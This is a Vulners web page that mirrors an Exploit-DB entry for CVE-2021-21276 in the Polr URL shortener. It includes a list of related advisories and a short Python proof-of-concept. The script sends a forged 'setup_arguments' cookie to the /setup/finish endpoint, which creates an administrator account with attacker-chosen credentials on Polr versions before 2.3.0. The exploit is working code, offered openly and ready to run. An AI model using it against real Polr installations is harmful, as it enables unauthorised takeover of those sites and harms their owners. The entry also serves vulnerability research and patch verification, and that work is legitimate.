Lucene search
K

POLR URL 2.3.0 - Shortener Admin Takeover

🗓️ 06 Apr 2023 00:00:00Reported by p4kl0nc4tType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 244 Views

POLR URL 2.3.0 Shortener Admin Takeover exploit

Related
Code
ReporterTitlePublishedViews
Family
0day.today
POLR URL 2.3.0 - Shortener Admin Account Takeover Exploit
6 Apr 202300:00
zdt
Circl
CVE-2021-21276
1 Feb 202119:25
circl
CNNVD
Cydrobolt Polr Security Vulnerability
1 Feb 202100:00
cnnvd
CVE
CVE-2021-21276
1 Feb 202100:00
cve
Cvelist
CVE-2021-21276 Privilege escalation in Polr
1 Feb 202100:00
cvelist
NVD
CVE-2021-21276
1 Feb 202115:15
nvd
Packet Storm
POLR URL 2.3.0 Shortener Admin Takeover
6 Apr 202300:00
packetstorm
Prion
Code injection
1 Feb 202115:15
prion
Positive Technologies
PT-2021-14382 · Polr · Polr
1 Feb 202100:00
ptsecurity
RedhatCVE
CVE-2021-21276
22 May 202521:32
redhatcve
Rows per page
# Exploit Title: POLR URL 2.3.0 - Shortener Admin Takeover
# Date: 2021-02-01
# Exploit Author: p4kl0nc4t <me-at-lcat-dot-dev>
# Vendor Homepage: -
# Software Link: https://github.com/cydrobolt/polr
# Version: < 2.3.0
# Tested on: Linux
# CVE : CVE-2021-21276


import json

import requests

payload = {
    'acct_username': 'admin',
    'acct_password': 'password',
    'acct_email': '[email protected]',
    'setup_auth_key': True,
}

r = requests.get('http://localhost/setup/finish',
                 cookies={'setup_arguments': json.dumps(payload)})
print(r.text)

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation